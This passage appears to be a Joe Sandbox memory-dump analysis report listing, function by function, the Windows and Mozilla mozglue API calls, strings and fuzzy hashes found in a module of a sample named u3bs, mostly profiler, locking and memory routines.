                                                                                                                                                          • Part of subcall function 6B0AAB89: LeaveCriticalSection.KERNEL32(6B0FE370,?,6B0734DE,6B0FF6CC,?,?,?,?,?,?,?,6B073284,?,?,6B0956F6), ref: 6B0AABD1
                                                                                                                                                        • LoadLibraryW.KERNEL32(combase.dll,6B081C5F), ref: 6B0820AE
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CoInitializeSecurity), ref: 6B0820CD
                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 6B0820E1
                                                                                                                                                        • FreeLibrary.KERNEL32 ref: 6B082124
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
                                                                                                                                                        • String ID: CoInitializeSecurity$combase.dll
                                                                                                                                                        • API String ID: 4190559335-2476802802
                                                                                                                                                        • Opcode ID: 618b28bd5879b1a5bc9b6a3637af38d95d44713de82f53f6991a2368bb8e44a9
                                                                                                                                                        • Instruction ID: 873d90f856903f7f612bc085c9a8a18764f5a136a63690869dff6dc8e8b0c09a
                                                                                                                                                        • Opcode Fuzzy Hash: 618b28bd5879b1a5bc9b6a3637af38d95d44713de82f53f6991a2368bb8e44a9
                                                                                                                                                        • Instruction Fuzzy Hash: DC216A76201209AFDF198F94EC48E8A3FBEFB4A7A4F104014FE0592250D73AD962CF61
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 6B0B9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6B084A68), ref: 6B0B945E
                                                                                                                                                          • Part of subcall function 6B0B9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6B0B9470
                                                                                                                                                          • Part of subcall function 6B0B9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6B0B9482
                                                                                                                                                          • Part of subcall function 6B0B9420: __Init_thread_footer.LIBCMT ref: 6B0B949F
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6B0B99C1
                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(6B0FF4B8), ref: 6B0B99CE
                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(6B0FF4B8), ref: 6B0B99F8
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6B0B9A05
                                                                                                                                                        • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6B0B9A0D
                                                                                                                                                          • Part of subcall function 6B0B9A60: GetCurrentThreadId.KERNEL32 ref: 6B0B9A95
                                                                                                                                                          • Part of subcall function 6B0B9A60: _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6B0B9A9D
                                                                                                                                                          • Part of subcall function 6B0B9A60: ?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6B0B9ACC
                                                                                                                                                          • Part of subcall function 6B0B9A60: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6B0B9BA7
                                                                                                                                                          • Part of subcall function 6B0B9A60: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000), ref: 6B0B9BB8
                                                                                                                                                          • Part of subcall function 6B0B9A60: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000,00000000), ref: 6B0B9BC9
                                                                                                                                                          • Part of subcall function 6B0ACBE8: GetCurrentProcess.KERNEL32(?,6B0731A7), ref: 6B0ACBF1
                                                                                                                                                          • Part of subcall function 6B0ACBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6B0731A7), ref: 6B0ACBFA
                                                                                                                                                        Strings
                                                                                                                                                        • [I %d/%d] profiler_stream_json_for_this_process, xrefs: 6B0B9A15
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Current$ThreadTimegetenv$ExclusiveLockProcessStampV01@@Value@mozilla@@_getpid$?profiler_time@baseprofiler@mozilla@@AcquireInit_thread_footerNow@ReleaseStamp@mozilla@@TerminateV12@_
                                                                                                                                                        • String ID: [I %d/%d] profiler_stream_json_for_this_process
                                                                                                                                                        • API String ID: 2359002670-141131661
                                                                                                                                                        • Opcode ID: a79ea055221a0903fcf088973c70b8b155971fe5d663f29d984b6116c21fe049
                                                                                                                                                        • Instruction ID: c8a5f1efb24961210ff10adc24141cd8246e4025a26fa685a3d2b117ab9f3684
                                                                                                                                                        • Opcode Fuzzy Hash: a79ea055221a0903fcf088973c70b8b155971fe5d663f29d984b6116c21fe049
                                                                                                                                                        • Instruction Fuzzy Hash: 7B01D235E051249BDB189F69B8497693FACEB97268F054056FD0A53342DB3ED802CAF2
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 6B0AAB89: EnterCriticalSection.KERNEL32(6B0FE370,?,?,?,6B0734DE,6B0FF6CC,?,?,?,?,?,?,?,6B073284), ref: 6B0AAB94
                                                                                                                                                          • Part of subcall function 6B0AAB89: LeaveCriticalSection.KERNEL32(6B0FE370,?,6B0734DE,6B0FF6CC,?,?,?,?,?,?,?,6B073284,?,?,6B0956F6), ref: 6B0AABD1
                                                                                                                                                        • LoadLibraryW.KERNEL32(combase.dll), ref: 6B08631B
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CoUninitialize), ref: 6B08633A
                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 6B08634E
                                                                                                                                                        • FreeLibrary.KERNEL32 ref: 6B086376
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
                                                                                                                                                        • String ID: CoUninitialize$combase.dll
                                                                                                                                                        • API String ID: 4190559335-3846590027
                                                                                                                                                        • Opcode ID: 9245e43e6321455b8df8f532b662b318f3c5cd24444ec709a2c723406593c072
                                                                                                                                                        • Instruction ID: 72dffd40c7bba700204475e85a61715a270220df310392a394d93493e94cac9a
                                                                                                                                                        • Opcode Fuzzy Hash: 9245e43e6321455b8df8f532b662b318f3c5cd24444ec709a2c723406593c072
                                                                                                                                                        • Instruction Fuzzy Hash: 5E0148B4726201CBEF088F68F548B147FAEB70AB54F004169DE02C3681EB38E506CE65
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6B0C9BAE
                                                                                                                                                        • free.MOZGLUE(?,?), ref: 6B0C9BC3
                                                                                                                                                        • free.MOZGLUE(?,?), ref: 6B0C9BD9
                                                                                                                                                          • Part of subcall function 6B0C93B0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6B0C94C8
                                                                                                                                                          • Part of subcall function 6B0C93B0: free.MOZGLUE(6B0C9281,?), ref: 6B0C94DD
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: free$StampTimeV01@@Value@mozilla@@
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 956590011-0
                                                                                                                                                        • Opcode ID: 38c0aa9d3c9b48c53f53501414e8b3a808ee7aaab1e6a746b43a2a8d263e3173
                                                                                                                                                        • Instruction ID: 1ef9b0977f86a36d3dc9df14578fb4b2ba91ec4576895c4f873a80fbbf58116b
                                                                                                                                                        • Opcode Fuzzy Hash: 38c0aa9d3c9b48c53f53501414e8b3a808ee7aaab1e6a746b43a2a8d263e3173
                                                                                                                                                        • Instruction Fuzzy Hash: 58B1C271A047048BCB0ACF68C48065FFBF5FFC9328B544659E8599B342DB35E946CB92
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 6B0B6060: moz_xmalloc.MOZGLUE(00000024,ABC14F15,00000000,?,00000000,?,?,6B0B5FCB,6B0B79A3), ref: 6B0B6078
                                                                                                                                                        • free.MOZGLUE(-00000001), ref: 6B0B72F6
                                                                                                                                                        • free.MOZGLUE(?), ref: 6B0B7311
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: free$moz_xmalloc
                                                                                                                                                        • String ID: 333s$333s$Copied unique strings$Spliced unique strings
                                                                                                                                                        • API String ID: 3009372454-760240034
                                                                                                                                                        • Opcode ID: 7f5ed8a95a1d3031b7ddd8c9fa4e139abde94c1e5013c503fd0928d22492f16a
                                                                                                                                                        • Instruction ID: f5c5badb719500591c98ef8b423787413bf456156ed882d48dea388df5587b76
                                                                                                                                                        • Opcode Fuzzy Hash: 7f5ed8a95a1d3031b7ddd8c9fa4e139abde94c1e5013c503fd0928d22492f16a
                                                                                                                                                        • Instruction Fuzzy Hash: E7717571F002158FDB1CCF69D89179DBBF2BF84314F25812DD81AA7250DB3AA946CB91
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • fgetc.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6B0CC1F1
                                                                                                                                                        • memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6B0CC293
                                                                                                                                                        • fgetc.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 6B0CC29E
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: fgetc$memcpy
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1522623862-0
                                                                                                                                                        • Opcode ID: 0c04ac2e07b00b3e8e25e14e5773bf1f25e4de92651358837cbb24846553d8f3
                                                                                                                                                        • Instruction ID: 3e6b3294811b1ac44640f6c76dedb45b836871489549f3987b3ba3a48287e231
                                                                                                                                                        • Opcode Fuzzy Hash: 0c04ac2e07b00b3e8e25e14e5773bf1f25e4de92651358837cbb24846553d8f3
                                                                                                                                                        • Instruction Fuzzy Hash: 78619C719042189FCB29CFACD880AAFBFF6FF49310F154569E802A7250C735A945CFA2
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6B0C9FDB
                                                                                                                                                        • free.MOZGLUE(?,?), ref: 6B0C9FF0
                                                                                                                                                        • free.MOZGLUE(?,?), ref: 6B0CA006
                                                                                                                                                        • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6B0CA0BE
                                                                                                                                                        • free.MOZGLUE(?,?), ref: 6B0CA0D5
                                                                                                                                                        • free.MOZGLUE(?,?), ref: 6B0CA0EB
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: free$StampTimeV01@@Value@mozilla@@
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 956590011-0
                                                                                                                                                        • Opcode ID: 573be8adbf11fdb5989e290562899ea177ab70ded3c2b3330164d2b4dbab56da
                                                                                                                                                        • Instruction ID: 232c98d582ec4a98739ebab79c667a9ea8347a496ee68d134e8e0507fa53baa5
                                                                                                                                                        • Opcode Fuzzy Hash: 573be8adbf11fdb5989e290562899ea177ab70ded3c2b3330164d2b4dbab56da
                                                                                                                                                        • Instruction Fuzzy Hash: D161B0758087019FC755CF58C48065BB7F5FF88368F609659EC999B202EB36E982CBC2
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • Sleep.KERNEL32(00000001), ref: 6B0BCA57
                                                                                                                                                        • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6B0BCA69
                                                                                                                                                        • Sleep.KERNEL32 ref: 6B0BCADD
                                                                                                                                                        • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6B0BCAEA
                                                                                                                                                        • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6B0BCAF5
                                                                                                                                                        • ?TicksFromMilliseconds@BaseTimeDurationPlatformUtils@mozilla@@SA_JN@Z.MOZGLUE ref: 6B0BCB19
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Time$Now@SleepStamp@mozilla@@V12@_$BaseDurationFromMilliseconds@PlatformStampTicksUtils@mozilla@@V01@@Value@mozilla@@
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 432163150-0
                                                                                                                                                        • Opcode ID: ed1fd172b3210a172a529f88a19ee0a116faa93031ebd3254f1ba7b167952e81
                                                                                                                                                        • Instruction ID: b568886c2de0f6634cea2d1fabcd54253d013e98c76c46b88d1d919929fba811
                                                                                                                                                        • Opcode Fuzzy Hash: ed1fd172b3210a172a529f88a19ee0a116faa93031ebd3254f1ba7b167952e81
                                                                                                                                                        • Instruction Fuzzy Hash: 99212331A047088BC30CAB38984166FBFBAFFC6749F408628E845A7180FF75D5858781
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • ??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000), ref: 6B0CC82D
                                                                                                                                                        • ??Bid@locale@std@@QAEIXZ.MSVCP140 ref: 6B0CC842
                                                                                                                                                          • Part of subcall function 6B0CCAF0: ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP140(00000000,00000000,?,6B0EB5EB,00000000), ref: 6B0CCB12
                                                                                                                                                        • ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(?,?,00000000), ref: 6B0CC863
                                                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 6B0CC875
                                                                                                                                                          • Part of subcall function 6B0AB13D: ??_U@YAPAXI@Z.MOZGLUE(00000008,?,?,6B0EB636,?), ref: 6B0AB143
                                                                                                                                                        • ??1_Lockit@std@@QAE@XZ.MSVCP140(00000000), ref: 6B0CC89A
                                                                                                                                                        • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6B0CC8BC
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Lockit@std@@$??0_??1_Bid@locale@std@@Facet_Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterV42@@Vfacet@locale@2@abortstd::_
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2745304114-0
                                                                                                                                                        • Opcode ID: 22b637a1eede3b44f81b2c97bd0de51af3b0485cde5031fb81b65c730ec97f71
                                                                                                                                                        • Instruction ID: 5bcd51d671d3df3e96550633181e86b888ce697604248368b3d48c7aeebfc2bb
                                                                                                                                                        • Opcode Fuzzy Hash: 22b637a1eede3b44f81b2c97bd0de51af3b0485cde5031fb81b65c730ec97f71
                                                                                                                                                        • Instruction Fuzzy Hash: D5112175B002099BCB04DFA4E8999AF7FB9EF89354F100529EA0697341EB34D905CFD6
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • moz_xmalloc.MOZGLUE(00000104), ref: 6B07EBB5
                                                                                                                                                          • Part of subcall function 6B08CA10: malloc.MOZGLUE(?), ref: 6B08CA26
                                                                                                                                                        • memset.VCRUNTIME140(00000000,00000000,00000104,?,?,6B0AD7F3), ref: 6B07EBC3
                                                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,6B0AD7F3), ref: 6B07EBD6
                                                                                                                                                        • free.MOZGLUE(?,?,?,?,?,?,6B0AD7F3), ref: 6B07EBF6
                                                                                                                                                        • free.MOZGLUE(00000000,?,?,?,?,?,?,6B0AD7F3), ref: 6B07EC0E
                                                                                                                                                          • Part of subcall function 6B095E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6B095EDB
                                                                                                                                                          • Part of subcall function 6B095E90: memset.VCRUNTIME140(ewk,000000E5,?), ref: 6B095F27
                                                                                                                                                          • Part of subcall function 6B095E90: LeaveCriticalSection.KERNEL32(?), ref: 6B095FB2
                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,6B0AD7F3), ref: 6B07EC1A
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CriticalSectionfreememset$EnterErrorFileLastLeaveModuleNamemallocmoz_xmalloc
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2948488910-0
                                                                                                                                                        • Opcode ID: 8c0d913205532808d4ad12abd4378fdf811cc1a017f8db68613fcfe73f3795b5
                                                                                                                                                        • Instruction ID: 64b51d3cc378405ec708eceadbf031588b5a9b66436ba02c0d654648b910c11a
                                                                                                                                                        • Opcode Fuzzy Hash: 8c0d913205532808d4ad12abd4378fdf811cc1a017f8db68613fcfe73f3795b5
                                                                                                                                                        • Instruction Fuzzy Hash: F1110CF5A052545BEB249A78AC497AFBEACAF01758F140475E806DB340E379DD0087F2
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                        • free.MOZGLUE(?), ref: 6B0C0270
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6B0C02E9
                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(6B0FF4B8), ref: 6B0C02F6
                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(6B0FF4B8), ref: 6B0C033A
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true
                                                                                                                                                        • Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        • Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
                                                                                                                                                        • String ID: about:blank
                                                                                                                                                        • API String ID: 2047719359-258612819
                                                                                                                                                        • Opcode ID: 296f31535899b48114f5a90bc30bd46ebb1adf84359015a0d288ed275cfb15f4
                                                                                                                                                        • Instruction ID: fce81034104659a2b81310ef6a03332a43321ba80c16a979451baf2eba8d7e81
                                                                                                                                                        • Opcode Fuzzy Hash: 296f31535899b48114f5a90bc30bd46ebb1adf84359015a0d288ed275cfb15f4
                                                                                                                                                        • Instruction Fuzzy Hash: 7E519DB5A042198FCB08DF58D8806AEBFF9FF88324F504559C91AA7351E735F942CB92
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 6B0B9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6B084A68), ref: 6B0B945E
                                                                                                                                                          • Part of subcall function 6B0B9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6B0B9470
                                                                                                                                                          • Part of subcall function 6B0B9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6B0B9482
                                                                                                                                                          • Part of subcall function 6B0B9420: __Init_thread_footer.LIBCMT ref: 6B0B949F
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6B0BE12F
                                                                                                                                                        • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,6B0BE084,00000000), ref: 6B0BE137
                                                                                                                                                          • Part of subcall function 6B0B94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6B0B94EE
                                                                                                                                                          • Part of subcall function 6B0B94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6B0B9508
                                                                                                                                                        • ?profiler_stream_json_for_this_process@baseprofiler@mozilla@@YA_NAAVSpliceableJSONWriter@12@N_N1@Z.MOZGLUE ref: 6B0BE196
                                                                                                                                                        • ?profiler_stream_json_for_this_process@baseprofiler@mozilla@@YA_NAAVSpliceableJSONWriter@12@N_N1@Z.MOZGLUE(?,?,?,?,?,?,?,?), ref: 6B0BE1E9
                                                                                                                                                          • Part of subcall function 6B0B99A0: GetCurrentThreadId.KERNEL32 ref: 6B0B99C1
                                                                                                                                                          • Part of subcall function 6B0B99A0: AcquireSRWLockExclusive.KERNEL32(6B0FF4B8), ref: 6B0B99CE
                                                                                                                                                          • Part of subcall function 6B0B99A0: ReleaseSRWLockExclusive.KERNEL32(6B0FF4B8), ref: 6B0B99F8
                                                                                                                                                        Strings
                                                                                                                                                        • [I %d/%d] WriteProfileToJSONWriter, xrefs: 6B0BE13F
                                                                                                                                                        Memory Dump Source
